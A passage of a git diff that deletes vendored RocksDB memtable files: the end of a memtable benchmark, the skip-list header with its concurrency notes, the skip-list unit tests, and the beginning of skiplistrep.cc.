-  rocksdb::Arena arena;
-  rocksdb::WriteBufferManager wb(FLAGS_write_buffer_size);
-  uint64_t sequence;
-  auto createMemtableRep = [&] {
-    sequence = 0;
-    return factory->CreateMemTableRep(key_comp, &arena,
-                                      options.prefix_extractor.get(),
-                                      options.info_log.get());
-  };
-  std::unique_ptr<rocksdb::MemTableRep> memtablerep;
-  rocksdb::Random64 rng(FLAGS_seed);
-  const char* benchmarks = FLAGS_benchmarks.c_str();
-  while (benchmarks != nullptr) {
-    std::unique_ptr<rocksdb::KeyGenerator> key_gen;
-    const char* sep = strchr(benchmarks, ',');
-    rocksdb::Slice name;
-    if (sep == nullptr) {
-      name = benchmarks;
-      benchmarks = nullptr;
-    } else {
-      name = rocksdb::Slice(benchmarks, sep - benchmarks);
-      benchmarks = sep + 1;
-    }
-    std::unique_ptr<rocksdb::Benchmark> benchmark;
-    if (name == rocksdb::Slice("fillseq")) {
-      memtablerep.reset(createMemtableRep());
-      key_gen.reset(new rocksdb::KeyGenerator(&rng, rocksdb::SEQUENTIAL,
-                                              FLAGS_num_operations));
-      benchmark.reset(new rocksdb::FillBenchmark(memtablerep.get(),
-                                                 key_gen.get(), &sequence));
-    } else if (name == rocksdb::Slice("fillrandom")) {
-      memtablerep.reset(createMemtableRep());
-      key_gen.reset(new rocksdb::KeyGenerator(&rng, rocksdb::UNIQUE_RANDOM,
-                                              FLAGS_num_operations));
-      benchmark.reset(new rocksdb::FillBenchmark(memtablerep.get(),
-                                                 key_gen.get(), &sequence));
-    } else if (name == rocksdb::Slice("readrandom")) {
-      key_gen.reset(new rocksdb::KeyGenerator(&rng, rocksdb::RANDOM,
-                                              FLAGS_num_operations));
-      benchmark.reset(new rocksdb::ReadBenchmark(memtablerep.get(),
-                                                 key_gen.get(), &sequence));
-    } else if (name == rocksdb::Slice("readseq")) {
-      key_gen.reset(new rocksdb::KeyGenerator(&rng, rocksdb::SEQUENTIAL,
-                                              FLAGS_num_operations));
-      benchmark.reset(
-          new rocksdb::SeqReadBenchmark(memtablerep.get(), &sequence));
-    } else if (name == rocksdb::Slice("readwrite")) {
-      memtablerep.reset(createMemtableRep());
-      key_gen.reset(new rocksdb::KeyGenerator(&rng, rocksdb::RANDOM,
-                                              FLAGS_num_operations));
-      benchmark.reset(new rocksdb::ReadWriteBenchmark<
-          rocksdb::ConcurrentReadBenchmarkThread>(memtablerep.get(),
-                                                  key_gen.get(), &sequence));
-    } else if (name == rocksdb::Slice("seqreadwrite")) {
-      memtablerep.reset(createMemtableRep());
-      key_gen.reset(new rocksdb::KeyGenerator(&rng, rocksdb::RANDOM,
-                                              FLAGS_num_operations));
-      benchmark.reset(new rocksdb::ReadWriteBenchmark<
-          rocksdb::SeqConcurrentReadBenchmarkThread>(memtablerep.get(),
-                                                     key_gen.get(), &sequence));
-    } else {
-      std::cout << "WARNING: skipping unknown benchmark '" << name.ToString()
-                << std::endl;
-      continue;
-    }
-    std::cout << "Running " << name.ToString() << std::endl;
-    benchmark->Run();
-  }
-
-  return 0;
-}
-
-#endif  // GFLAGS
diff --git a/thirdparty/rocksdb/memtable/skiplist.h b/thirdparty/rocksdb/memtable/skiplist.h
deleted file mode 100644
index 0162dcc..0000000
--- a/thirdparty/rocksdb/memtable/skiplist.h
+++ /dev/null
@@ -1,495 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// Thread safety
-// -------------
-//
-// Writes require external synchronization, most likely a mutex.
-// Reads require a guarantee that the SkipList will not be destroyed
-// while the read is in progress.  Apart from that, reads progress
-// without any internal locking or synchronization.
-//
-// Invariants:
-//
-// (1) Allocated nodes are never deleted until the SkipList is
-// destroyed.  This is trivially guaranteed by the code since we
-// never delete any skip list nodes.
-//
-// (2) The contents of a Node except for the next/prev pointers are
-// immutable after the Node has been linked into the SkipList.
-// Only Insert() modifies the list, and it is careful to initialize
-// a node and use release-stores to publish the nodes in one or
-// more lists.
-//
-// ... prev vs. next pointer ordering ...
-//
-
-#pragma once
-#include <assert.h>
-#include <atomic>
-#include <stdlib.h>
-#include "port/port.h"
-#include "util/allocator.h"
-#include "util/random.h"
-
-namespace rocksdb {
-
-template<typename Key, class Comparator>
-class SkipList {
- private:
-  struct Node;
-
- public:
-  // Create a new SkipList object that will use "cmp" for comparing keys,
-  // and will allocate memory using "*allocator".  Objects allocated in the
-  // allocator must remain allocated for the lifetime of the skiplist object.
-  explicit SkipList(Comparator cmp, Allocator* allocator,
-                    int32_t max_height = 12, int32_t branching_factor = 4);
-
-  // Insert key into the list.
-  // REQUIRES: nothing that compares equal to key is currently in the list.
-  void Insert(const Key& key);
-
-  // Returns true iff an entry that compares equal to key is in the list.
-  bool Contains(const Key& key) const;
-
-  // Return estimated number of entries smaller than `key`.
-  uint64_t EstimateCount(const Key& key) const;
-
-  // Iteration over the contents of a skip list
-  class Iterator {
-   public:
-    // Initialize an iterator over the specified list.
-    // The returned iterator is not valid.
-    explicit Iterator(const SkipList* list);
-
-    // Change the underlying skiplist used for this iterator
-    // This enables us not changing the iterator without deallocating
-    // an old one and then allocating a new one
-    void SetList(const SkipList* list);
-
-    // Returns true iff the iterator is positioned at a valid node.
-    bool Valid() const;
-
-    // Returns the key at the current position.
-    // REQUIRES: Valid()
-    const Key& key() const;
-
-    // Advances to the next position.
-    // REQUIRES: Valid()
-    void Next();
-
-    // Advances to the previous position.
-    // REQUIRES: Valid()
-    void Prev();
-
-    // Advance to the first entry with a key >= target
-    void Seek(const Key& target);
-
-    // Retreat to the last entry with a key <= target
-    void SeekForPrev(const Key& target);
-
-    // Position at the first entry in list.
-    // Final state of iterator is Valid() iff list is not empty.
-    void SeekToFirst();
-
-    // Position at the last entry in list.
-    // Final state of iterator is Valid() iff list is not empty.
-    void SeekToLast();
-
-   private:
-    const SkipList* list_;
-    Node* node_;
-    // Intentionally copyable
-  };
-
- private:
-  const uint16_t kMaxHeight_;
-  const uint16_t kBranching_;
-  const uint32_t kScaledInverseBranching_;
-
-  // Immutable after construction
-  Comparator const compare_;
-  Allocator* const allocator_;    // Allocator used for allocations of nodes
-
-  Node* const head_;
-
-  // Modified only by Insert().  Read racily by readers, but stale
-  // values are ok.
-  std::atomic<int> max_height_;  // Height of the entire list
-
-  // Used for optimizing sequential insert patterns.  Tricky.  prev_[i] for
-  // i up to max_height_ is the predecessor of prev_[0] and prev_height_
-  // is the height of prev_[0].  prev_[0] can only be equal to head before
-  // insertion, in which case max_height_ and prev_height_ are 1.
-  Node** prev_;
-  int32_t prev_height_;
-
-  inline int GetMaxHeight() const {
-    return max_height_.load(std::memory_order_relaxed);
-  }
-
-  Node* NewNode(const Key& key, int height);
-  int RandomHeight();
-  bool Equal(const Key& a, const Key& b) const { return (compare_(a, b) == 0); }
-  bool LessThan(const Key& a, const Key& b) const {
-    return (compare_(a, b) < 0);
-  }
-
-  // Return true if key is greater than the data stored in "n"
-  bool KeyIsAfterNode(const Key& key, Node* n) const;
-
-  // Returns the earliest node with a key >= key.
-  // Return nullptr if there is no such node.
-  Node* FindGreaterOrEqual(const Key& key) const;
-
-  // Return the latest node with a key < key.
-  // Return head_ if there is no such node.
-  // Fills prev[level] with pointer to previous node at "level" for every
-  // level in [0..max_height_-1], if prev is non-null.
-  Node* FindLessThan(const Key& key, Node** prev = nullptr) const;
-
-  // Return the last node in the list.
-  // Return head_ if list is empty.
-  Node* FindLast() const;
-
-  // No copying allowed
-  SkipList(const SkipList&);
-  void operator=(const SkipList&);
-};
-
-// Implementation details follow
-template<typename Key, class Comparator>
-struct SkipList<Key, Comparator>::Node {
-  explicit Node(const Key& k) : key(k) { }
-
-  Key const key;
-
-  // Accessors/mutators for links.  Wrapped in methods so we can
-  // add the appropriate barriers as necessary.
-  Node* Next(int n) {
-    assert(n >= 0);
-    // Use an 'acquire load' so that we observe a fully initialized
-    // version of the returned Node.
-    return (next_[n].load(std::memory_order_acquire));
-  }
-  void SetNext(int n, Node* x) {
-    assert(n >= 0);
-    // Use a 'release store' so that anybody who reads through this
-    // pointer observes a fully initialized version of the inserted node.
-    next_[n].store(x, std::memory_order_release);
-  }
-
-  // No-barrier variants that can be safely used in a few locations.
-  Node* NoBarrier_Next(int n) {
-    assert(n >= 0);
-    return next_[n].load(std::memory_order_relaxed);
-  }
-  void NoBarrier_SetNext(int n, Node* x) {
-    assert(n >= 0);
-    next_[n].store(x, std::memory_order_relaxed);
-  }
-
- private:
-  // Array of length equal to the node height.  next_[0] is lowest level link.
-  std::atomic<Node*> next_[1];
-};
-
-template<typename Key, class Comparator>
-typename SkipList<Key, Comparator>::Node*
-SkipList<Key, Comparator>::NewNode(const Key& key, int height) {
-  char* mem = allocator_->AllocateAligned(
-      sizeof(Node) + sizeof(std::atomic<Node*>) * (height - 1));
-  return new (mem) Node(key);
-}
-
-template<typename Key, class Comparator>
-inline SkipList<Key, Comparator>::Iterator::Iterator(const SkipList* list) {
-  SetList(list);
-}
-
-template<typename Key, class Comparator>
-inline void SkipList<Key, Comparator>::Iterator::SetList(const SkipList* list) {
-  list_ = list;
-  node_ = nullptr;
-}
-
-template<typename Key, class Comparator>
-inline bool SkipList<Key, Comparator>::Iterator::Valid() const {
-  return node_ != nullptr;
-}
-
-template<typename Key, class Comparator>
-inline const Key& SkipList<Key, Comparator>::Iterator::key() const {
-  assert(Valid());
-  return node_->key;
-}
-
-template<typename Key, class Comparator>
-inline void SkipList<Key, Comparator>::Iterator::Next() {
-  assert(Valid());
-  node_ = node_->Next(0);
-}
-
-template<typename Key, class Comparator>
-inline void SkipList<Key, Comparator>::Iterator::Prev() {
-  // Instead of using explicit "prev" links, we just search for the
-  // last node that falls before key.
-  assert(Valid());
-  node_ = list_->FindLessThan(node_->key);
-  if (node_ == list_->head_) {
-    node_ = nullptr;
-  }
-}
-
-template<typename Key, class Comparator>
-inline void SkipList<Key, Comparator>::Iterator::Seek(const Key& target) {
-  node_ = list_->FindGreaterOrEqual(target);
-}
-
-template <typename Key, class Comparator>
-inline void SkipList<Key, Comparator>::Iterator::SeekForPrev(
-    const Key& target) {
-  Seek(target);
-  if (!Valid()) {
-    SeekToLast();
-  }
-  while (Valid() && list_->LessThan(target, key())) {
-    Prev();
-  }
-}
-
-template <typename Key, class Comparator>
-inline void SkipList<Key, Comparator>::Iterator::SeekToFirst() {
-  node_ = list_->head_->Next(0);
-}
-
-template<typename Key, class Comparator>
-inline void SkipList<Key, Comparator>::Iterator::SeekToLast() {
-  node_ = list_->FindLast();
-  if (node_ == list_->head_) {
-    node_ = nullptr;
-  }
-}
-
-template<typename Key, class Comparator>
-int SkipList<Key, Comparator>::RandomHeight() {
-  auto rnd = Random::GetTLSInstance();
-
-  // Increase height with probability 1 in kBranching
-  int height = 1;
-  while (height < kMaxHeight_ && rnd->Next() < kScaledInverseBranching_) {
-    height++;
-  }
-  assert(height > 0);
-  assert(height <= kMaxHeight_);
-  return height;
-}
-
-template<typename Key, class Comparator>
-bool SkipList<Key, Comparator>::KeyIsAfterNode(const Key& key, Node* n) const {
-  // nullptr n is considered infinite
-  return (n != nullptr) && (compare_(n->key, key) < 0);
-}
-
-template<typename Key, class Comparator>
-typename SkipList<Key, Comparator>::Node* SkipList<Key, Comparator>::
-  FindGreaterOrEqual(const Key& key) const {
-  // Note: It looks like we could reduce duplication by implementing
-  // this function as FindLessThan(key)->Next(0), but we wouldn't be able
-  // to exit early on equality and the result wouldn't even be correct.
-  // A concurrent insert might occur after FindLessThan(key) but before
-  // we get a chance to call Next(0).
-  Node* x = head_;
-  int level = GetMaxHeight() - 1;
-  Node* last_bigger = nullptr;
-  while (true) {
-    Node* next = x->Next(level);
-    // Make sure the lists are sorted
-    assert(x == head_ || next == nullptr || KeyIsAfterNode(next->key, x));
-    // Make sure we haven't overshot during our search
-    assert(x == head_ || KeyIsAfterNode(key, x));
-    int cmp = (next == nullptr || next == last_bigger)
-        ? 1 : compare_(next->key, key);
-    if (cmp == 0 || (cmp > 0 && level == 0)) {
-      return next;
-    } else if (cmp < 0) {
-      // Keep searching in this list
-      x = next;
-    } else {
-      // Switch to next list, reuse compare_() result
-      last_bigger = next;
-      level--;
-    }
-  }
-}
-
-template<typename Key, class Comparator>
-typename SkipList<Key, Comparator>::Node*
-SkipList<Key, Comparator>::FindLessThan(const Key& key, Node** prev) const {
-  Node* x = head_;
-  int level = GetMaxHeight() - 1;
-  // KeyIsAfter(key, last_not_after) is definitely false
-  Node* last_not_after = nullptr;
-  while (true) {
-    Node* next = x->Next(level);
-    assert(x == head_ || next == nullptr || KeyIsAfterNode(next->key, x));
-    assert(x == head_ || KeyIsAfterNode(key, x));
-    if (next != last_not_after && KeyIsAfterNode(key, next)) {
-      // Keep searching in this list
-      x = next;
-    } else {
-      if (prev != nullptr) {
-        prev[level] = x;
-      }
-      if (level == 0) {
-        return x;
-      } else {
-        // Switch to next list, reuse KeyIUsAfterNode() result
-        last_not_after = next;
-        level--;
-      }
-    }
-  }
-}
-
-template<typename Key, class Comparator>
-typename SkipList<Key, Comparator>::Node* SkipList<Key, Comparator>::FindLast()
-    const {
-  Node* x = head_;
-  int level = GetMaxHeight() - 1;
-  while (true) {
-    Node* next = x->Next(level);
-    if (next == nullptr) {
-      if (level == 0) {
-        return x;
-      } else {
-        // Switch to next list
-        level--;
-      }
-    } else {
-      x = next;
-    }
-  }
-}
-
-template <typename Key, class Comparator>
-uint64_t SkipList<Key, Comparator>::EstimateCount(const Key& key) const {
-  uint64_t count = 0;
-
-  Node* x = head_;
-  int level = GetMaxHeight() - 1;
-  while (true) {
-    assert(x == head_ || compare_(x->key, key) < 0);
-    Node* next = x->Next(level);
-    if (next == nullptr || compare_(next->key, key) >= 0) {
-      if (level == 0) {
-        return count;
-      } else {
-        // Switch to next list
-        count *= kBranching_;
-        level--;
-      }
-    } else {
-      x = next;
-      count++;
-    }
-  }
-}
-
-template <typename Key, class Comparator>
-SkipList<Key, Comparator>::SkipList(const Comparator cmp, Allocator* allocator,
-                                    int32_t max_height,
-                                    int32_t branching_factor)
-    : kMaxHeight_(max_height),
-      kBranching_(branching_factor),
-      kScaledInverseBranching_((Random::kMaxNext + 1) / kBranching_),
-      compare_(cmp),
-      allocator_(allocator),
-      head_(NewNode(0 /* any key will do */, max_height)),
-      max_height_(1),
-      prev_height_(1) {
-  assert(max_height > 0 && kMaxHeight_ == static_cast<uint32_t>(max_height));
-  assert(branching_factor > 0 &&
-         kBranching_ == static_cast<uint32_t>(branching_factor));
-  assert(kScaledInverseBranching_ > 0);
-  // Allocate the prev_ Node* array, directly from the passed-in allocator.
-  // prev_ does not need to be freed, as its life cycle is tied up with
-  // the allocator as a whole.
-  prev_ = reinterpret_cast<Node**>(
-            allocator_->AllocateAligned(sizeof(Node*) * kMaxHeight_));
-  for (int i = 0; i < kMaxHeight_; i++) {
-    head_->SetNext(i, nullptr);
-    prev_[i] = head_;
-  }
-}
-
-template<typename Key, class Comparator>
-void SkipList<Key, Comparator>::Insert(const Key& key) {
-  // fast path for sequential insertion
-  if (!KeyIsAfterNode(key, prev_[0]->NoBarrier_Next(0)) &&
-      (prev_[0] == head_ || KeyIsAfterNode(key, prev_[0]))) {
-    assert(prev_[0] != head_ || (prev_height_ == 1 && GetMaxHeight() == 1));
-
-    // Outside of this method prev_[1..max_height_] is the predecessor
-    // of prev_[0], and prev_height_ refers to prev_[0].  Inside Insert
-    // prev_[0..max_height - 1] is the predecessor of key.  Switch from
-    // the external state to the internal
-    for (int i = 1; i < prev_height_; i++) {
-      prev_[i] = prev_[0];
-    }
-  } else {
-    // TODO(opt): we could use a NoBarrier predecessor search as an
-    // optimization for architectures where memory_order_acquire needs
-    // a synchronization instruction.  Doesn't matter on x86
-    FindLessThan(key, prev_);
-  }
-
-  // Our data structure does not allow duplicate insertion
-  assert(prev_[0]->Next(0) == nullptr || !Equal(key, prev_[0]->Next(0)->key));
-
-  int height = RandomHeight();
-  if (height > GetMaxHeight()) {
-    for (int i = GetMaxHeight(); i < height; i++) {
-      prev_[i] = head_;
-    }
-    //fprintf(stderr, "Change height from %d to %d\n", max_height_, height);
-
-    // It is ok to mutate max_height_ without any synchronization
-    // with concurrent readers.  A concurrent reader that observes
-    // the new value of max_height_ will see either the old value of
-    // new level pointers from head_ (nullptr), or a new value set in
-    // the loop below.  In the former case the reader will
-    // immediately drop to the next level since nullptr sorts after all
-    // keys.  In the latter case the reader will use the new node.
-    max_height_.store(height, std::memory_order_relaxed);
-  }
-
-  Node* x = NewNode(key, height);
-  for (int i = 0; i < height; i++) {
-    // NoBarrier_SetNext() suffices since we will add a barrier when
-    // we publish a pointer to "x" in prev[i].
-    x->NoBarrier_SetNext(i, prev_[i]->NoBarrier_Next(i));
-    prev_[i]->SetNext(i, x);
-  }
-  prev_[0] = x;
-  prev_height_ = height;
-}
-
-template<typename Key, class Comparator>
-bool SkipList<Key, Comparator>::Contains(const Key& key) const {
-  Node* x = FindGreaterOrEqual(key);
-  if (x != nullptr && Equal(key, x->key)) {
-    return true;
-  } else {
-    return false;
-  }
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/memtable/skiplist_test.cc b/thirdparty/rocksdb/memtable/skiplist_test.cc
deleted file mode 100644
index 50c3588..0000000
--- a/thirdparty/rocksdb/memtable/skiplist_test.cc
+++ /dev/null
@@ -1,388 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "memtable/skiplist.h"
-#include <set>
-#include "rocksdb/env.h"
-#include "util/arena.h"
-#include "util/hash.h"
-#include "util/random.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-typedef uint64_t Key;
-
-struct TestComparator {
-  int operator()(const Key& a, const Key& b) const {
-    if (a < b) {
-      return -1;
-    } else if (a > b) {
-      return +1;
-    } else {
-      return 0;
-    }
-  }
-};
-
-class SkipTest : public testing::Test {};
-
-TEST_F(SkipTest, Empty) {
-  Arena arena;
-  TestComparator cmp;
-  SkipList<Key, TestComparator> list(cmp, &arena);
-  ASSERT_TRUE(!list.Contains(10));
-
-  SkipList<Key, TestComparator>::Iterator iter(&list);
-  ASSERT_TRUE(!iter.Valid());
-  iter.SeekToFirst();
-  ASSERT_TRUE(!iter.Valid());
-  iter.Seek(100);
-  ASSERT_TRUE(!iter.Valid());
-  iter.SeekForPrev(100);
-  ASSERT_TRUE(!iter.Valid());
-  iter.SeekToLast();
-  ASSERT_TRUE(!iter.Valid());
-}
-
-TEST_F(SkipTest, InsertAndLookup) {
-  const int N = 2000;
-  const int R = 5000;
-  Random rnd(1000);
-  std::set<Key> keys;
-  Arena arena;
-  TestComparator cmp;
-  SkipList<Key, TestComparator> list(cmp, &arena);
-  for (int i = 0; i < N; i++) {
-    Key key = rnd.Next() % R;
-    if (keys.insert(key).second) {
-      list.Insert(key);
-    }
-  }
-
-  for (int i = 0; i < R; i++) {
-    if (list.Contains(i)) {
-      ASSERT_EQ(keys.count(i), 1U);
-    } else {
-      ASSERT_EQ(keys.count(i), 0U);
-    }
-  }
-
-  // Simple iterator tests
-  {
-    SkipList<Key, TestComparator>::Iterator iter(&list);
-    ASSERT_TRUE(!iter.Valid());
-
-    iter.Seek(0);
-    ASSERT_TRUE(iter.Valid());
-    ASSERT_EQ(*(keys.begin()), iter.key());
-
-    iter.SeekForPrev(R - 1);
-    ASSERT_TRUE(iter.Valid());
-    ASSERT_EQ(*(keys.rbegin()), iter.key());
-
-    iter.SeekToFirst();
-    ASSERT_TRUE(iter.Valid());
-    ASSERT_EQ(*(keys.begin()), iter.key());
-
-    iter.SeekToLast();
-    ASSERT_TRUE(iter.Valid());
-    ASSERT_EQ(*(keys.rbegin()), iter.key());
-  }
-
-  // Forward iteration test
-  for (int i = 0; i < R; i++) {
-    SkipList<Key, TestComparator>::Iterator iter(&list);
-    iter.Seek(i);
-
-    // Compare against model iterator
-    std::set<Key>::iterator model_iter = keys.lower_bound(i);
-    for (int j = 0; j < 3; j++) {
-      if (model_iter == keys.end()) {
-        ASSERT_TRUE(!iter.Valid());
-        break;
-      } else {
-        ASSERT_TRUE(iter.Valid());
-        ASSERT_EQ(*model_iter, iter.key());
-        ++model_iter;
-        iter.Next();
-      }
-    }
-  }
-
-  // Backward iteration test
-  for (int i = 0; i < R; i++) {
-    SkipList<Key, TestComparator>::Iterator iter(&list);
-    iter.SeekForPrev(i);
-
-    // Compare against model iterator
-    std::set<Key>::iterator model_iter = keys.upper_bound(i);
-    for (int j = 0; j < 3; j++) {
-      if (model_iter == keys.begin()) {
-        ASSERT_TRUE(!iter.Valid());
-        break;
-      } else {
-        ASSERT_TRUE(iter.Valid());
-        ASSERT_EQ(*--model_iter, iter.key());
-        iter.Prev();
-      }
-    }
-  }
-}
-
-// We want to make sure that with a single writer and multiple
-// concurrent readers (with no synchronization other than when a
-// reader's iterator is created), the reader always observes all the
-// data that was present in the skip list when the iterator was
-// constructor.  Because insertions are happening concurrently, we may
-// also observe new values that were inserted since the iterator was
-// constructed, but we should never miss any values that were present
-// at iterator construction time.
-//
-// We generate multi-part keys:
-//     <key,gen,hash>
-// where:
-//     key is in range [0..K-1]
-//     gen is a generation number for key
-//     hash is hash(key,gen)
-//
-// The insertion code picks a random key, sets gen to be 1 + the last
-// generation number inserted for that key, and sets hash to Hash(key,gen).
-//
-// At the beginning of a read, we snapshot the last inserted
-// generation number for each key.  We then iterate, including random
-// calls to Next() and Seek().  For every key we encounter, we
-// check that it is either expected given the initial snapshot or has
-// been concurrently added since the iterator started.
-class ConcurrentTest {
- private:
-  static const uint32_t K = 4;
-
-  static uint64_t key(Key key) { return (key >> 40); }
-  static uint64_t gen(Key key) { return (key >> 8) & 0xffffffffu; }
-  static uint64_t hash(Key key) { return key & 0xff; }
-
-  static uint64_t HashNumbers(uint64_t k, uint64_t g) {
-    uint64_t data[2] = { k, g };
-    return Hash(reinterpret_cast<char*>(data), sizeof(data), 0);
-  }
-
-  static Key MakeKey(uint64_t k, uint64_t g) {
-    assert(sizeof(Key) == sizeof(uint64_t));
-    assert(k <= K);  // We sometimes pass K to seek to the end of the skiplist
-    assert(g <= 0xffffffffu);
-    return ((k << 40) | (g << 8) | (HashNumbers(k, g) & 0xff));
-  }
-
-  static bool IsValidKey(Key k) {
-    return hash(k) == (HashNumbers(key(k), gen(k)) & 0xff);
-  }
-
-  static Key RandomTarget(Random* rnd) {
-    switch (rnd->Next() % 10) {
-      case 0:
-        // Seek to beginning
-        return MakeKey(0, 0);
-      case 1:
-        // Seek to end
-        return MakeKey(K, 0);
-      default:
-        // Seek to middle
-        return MakeKey(rnd->Next() % K, 0);
-    }
-  }
-
-  // Per-key generation
-  struct State {
-    std::atomic<int> generation[K];
-    void Set(int k, int v) {
-      generation[k].store(v, std::memory_order_release);
-    }
-    int Get(int k) { return generation[k].load(std::memory_order_acquire); }
-
-    State() {
-      for (unsigned int k = 0; k < K; k++) {
-        Set(k, 0);
-      }
-    }
-  };
-
-  // Current state of the test
-  State current_;
-
-  Arena arena_;
-
-  // SkipList is not protected by mu_.  We just use a single writer
-  // thread to modify it.
-  SkipList<Key, TestComparator> list_;
-
- public:
-  ConcurrentTest() : list_(TestComparator(), &arena_) {}
-
-  // REQUIRES: External synchronization
-  void WriteStep(Random* rnd) {
-    const uint32_t k = rnd->Next() % K;
-    const int g = current_.Get(k) + 1;
-    const Key new_key = MakeKey(k, g);
-    list_.Insert(new_key);
-    current_.Set(k, g);
-  }
-
-  void ReadStep(Random* rnd) {
-    // Remember the initial committed state of the skiplist.
-    State initial_state;
-    for (unsigned int k = 0; k < K; k++) {
-      initial_state.Set(k, current_.Get(k));
-    }
-
-    Key pos = RandomTarget(rnd);
-    SkipList<Key, TestComparator>::Iterator iter(&list_);
-    iter.Seek(pos);
-    while (true) {
-      Key current;
-      if (!iter.Valid()) {
-        current = MakeKey(K, 0);
-      } else {
-        current = iter.key();
-        ASSERT_TRUE(IsValidKey(current)) << current;
-      }
-      ASSERT_LE(pos, current) << "should not go backwards";
-
-      // Verify that everything in [pos,current) was not present in
-      // initial_state.
-      while (pos < current) {
-        ASSERT_LT(key(pos), K) << pos;
-
-        // Note that generation 0 is never inserted, so it is ok if
-        // <*,0,*> is missing.
-        ASSERT_TRUE((gen(pos) == 0U) ||
-                    (gen(pos) > static_cast<uint64_t>(initial_state.Get(
-                                    static_cast<int>(key(pos))))))
-            << "key: " << key(pos) << "; gen: " << gen(pos)
-            << "; initgen: " << initial_state.Get(static_cast<int>(key(pos)));
-
-        // Advance to next key in the valid key space
-        if (key(pos) < key(current)) {
-          pos = MakeKey(key(pos) + 1, 0);
-        } else {
-          pos = MakeKey(key(pos), gen(pos) + 1);
-        }
-      }
-
-      if (!iter.Valid()) {
-        break;
-      }
-
-      if (rnd->Next() % 2) {
-        iter.Next();
-        pos = MakeKey(key(pos), gen(pos) + 1);
-      } else {
-        Key new_target = RandomTarget(rnd);
-        if (new_target > pos) {
-          pos = new_target;
-          iter.Seek(new_target);
-        }
-      }
-    }
-  }
-};
-const uint32_t ConcurrentTest::K;
-
-// Simple test that does single-threaded testing of the ConcurrentTest
-// scaffolding.
-TEST_F(SkipTest, ConcurrentWithoutThreads) {
-  ConcurrentTest test;
-  Random rnd(test::RandomSeed());
-  for (int i = 0; i < 10000; i++) {
-    test.ReadStep(&rnd);
-    test.WriteStep(&rnd);
-  }
-}
-
-class TestState {
- public:
-  ConcurrentTest t_;
-  int seed_;
-  std::atomic<bool> quit_flag_;
-
-  enum ReaderState {
-    STARTING,
-    RUNNING,
-    DONE
-  };
-
-  explicit TestState(int s)
-      : seed_(s), quit_flag_(false), state_(STARTING), state_cv_(&mu_) {}
-
-  void Wait(ReaderState s) {
-    mu_.Lock();
-    while (state_ != s) {
-      state_cv_.Wait();
-    }
-    mu_.Unlock();
-  }
-
-  void Change(ReaderState s) {
-    mu_.Lock();
-    state_ = s;
-    state_cv_.Signal();
-    mu_.Unlock();
-  }
-
- private:
-  port::Mutex mu_;
-  ReaderState state_;
-  port::CondVar state_cv_;
-};
-
-static void ConcurrentReader(void* arg) {
-  TestState* state = reinterpret_cast<TestState*>(arg);
-  Random rnd(state->seed_);
-  int64_t reads = 0;
-  state->Change(TestState::RUNNING);
-  while (!state->quit_flag_.load(std::memory_order_acquire)) {
-    state->t_.ReadStep(&rnd);
-    ++reads;
-  }
-  state->Change(TestState::DONE);
-}
-
-static void RunConcurrent(int run) {
-  const int seed = test::RandomSeed() + (run * 100);
-  Random rnd(seed);
-  const int N = 1000;
-  const int kSize = 1000;
-  for (int i = 0; i < N; i++) {
-    if ((i % 100) == 0) {
-      fprintf(stderr, "Run %d of %d\n", i, N);
-    }
-    TestState state(seed + 1);
-    Env::Default()->SetBackgroundThreads(1);
-    Env::Default()->Schedule(ConcurrentReader, &state);
-    state.Wait(TestState::RUNNING);
-    for (int k = 0; k < kSize; k++) {
-      state.t_.WriteStep(&rnd);
-    }
-    state.quit_flag_.store(true, std::memory_order_release);
-    state.Wait(TestState::DONE);
-  }
-}
-
-TEST_F(SkipTest, Concurrent1) { RunConcurrent(1); }
-TEST_F(SkipTest, Concurrent2) { RunConcurrent(2); }
-TEST_F(SkipTest, Concurrent3) { RunConcurrent(3); }
-TEST_F(SkipTest, Concurrent4) { RunConcurrent(4); }
-TEST_F(SkipTest, Concurrent5) { RunConcurrent(5); }
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/memtable/skiplistrep.cc b/thirdparty/rocksdb/memtable/skiplistrep.cc
deleted file mode 100644
index f56be5d..0000000
--- a/thirdparty/rocksdb/memtable/skiplistrep.cc
+++ /dev/null
@@ -1,277 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#include "memtable/inlineskiplist.h"
-#include "db/memtable.h"
-#include "rocksdb/memtablerep.h"
-#include "util/arena.h"
-
-namespace rocksdb {
-namespace {
-class SkipListRep : public MemTableRep {
-  InlineSkipList<const MemTableRep::KeyComparator&> skip_list_;
-  const MemTableRep::KeyComparator& cmp_;
-  const SliceTransform* transform_;
-  const size_t lookahead_;
-
-  friend class LookaheadIterator;
-public:
- explicit SkipListRep(const MemTableRep::KeyComparator& compare,
-                      Allocator* allocator, const SliceTransform* transform,
-                      const size_t lookahead)
-     : MemTableRep(allocator),
-       skip_list_(compare, allocator),
-       cmp_(compare),
-       transform_(transform),
-       lookahead_(lookahead) {}
-
- virtual KeyHandle Allocate(const size_t len, char** buf) override {
-   *buf = skip_list_.AllocateKey(len);
-   return static_cast<KeyHandle>(*buf);
-  }
-
-  // Insert key into the list.
-  // REQUIRES: nothing that compares equal to key is currently in the list.
-  virtual void Insert(KeyHandle handle) override {
-    skip_list_.Insert(static_cast<char*>(handle));
-  }
-
-  virtual void InsertWithHint(KeyHandle handle, void** hint) override {
-    skip_list_.InsertWithHint(static_cast<char*>(handle), hint);
-  }
-
